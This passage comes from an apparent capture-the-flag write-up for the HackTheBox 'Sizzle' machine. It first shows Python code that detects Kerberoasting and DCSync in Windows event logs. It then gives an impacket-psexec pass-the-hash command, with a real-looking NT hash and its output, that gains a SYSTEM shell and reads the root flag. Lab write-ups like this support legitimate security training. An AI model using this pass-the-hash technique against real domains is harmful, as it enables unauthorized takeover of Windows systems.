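     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "SIZZLE$", "SubjectDomainName": "HTB", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "mrlky", "SubjectDomainName": "HTB", "AccessMask": "0x10",
     "Properties": "Read Property {deadbeef-0000-0000-0000-000000000001}"},
]


def is_kerberoast_request(ev: dict) -> bool:
    """RC4 service ticket for a user account's SPN. Machine accounts and krbtgt are
    excluded; legacy RC4-only services would need their own allow-list."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def replication_rights_used(ev: dict) -> list:
    """Names of replication rights in a 4662 Control Access event, [] if none."""
    if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
        return []
    guids = GUID_RE.findall(ev["Properties"].lower())
    return [REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS]


def is_dcsync(ev: dict) -> bool:
    """Replication rights exercised by an account that is not a known replication partner."""
    return bool(replication_rights_used(ev)) and ev["SubjectUserName"] not in REPLICATION_ALLOWED


def triage(events: list) -> list:
    """Return (kind, summary) alerts for Kerberoast and DCSync indicators."""
    alerts = []
    for ev in events:
        if is_kerberoast_request(ev):
            alerts.append(("kerberoast", f"{ev['TargetUserName']} got an RC4 ticket "
                                         f"for {ev['ServiceName']} from {ev['IpAddress']}"))
        elif is_dcsync(ev):
            rights = ", ".join(replication_rights_used(ev))
            alerts.append(("dcsync", f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']} used {rights}"))
    return alerts


if __name__ == "__main__":
    for kind, summary in triage(EVENTS):
        print(f"[{kind}] {summary}")
```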
With the Administrator's NT hash we can pass the hash to authenticate with psexec and get a shell as nt authority\system.
❯ impacket-psexec htb.local/Administrator@sizzle.htb.local -hashes :f6b7160bfc91823792e0ac3a162c9267
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on sizzle.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file PZQqHJdn.exe
[*] Opening SVCManager on sizzle.htb.local.....
[*] Creating service NaUn on sizzle.htb.local.....
[*] Starting service NaUn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
3b7**************************bd7
C:\Windows\system32>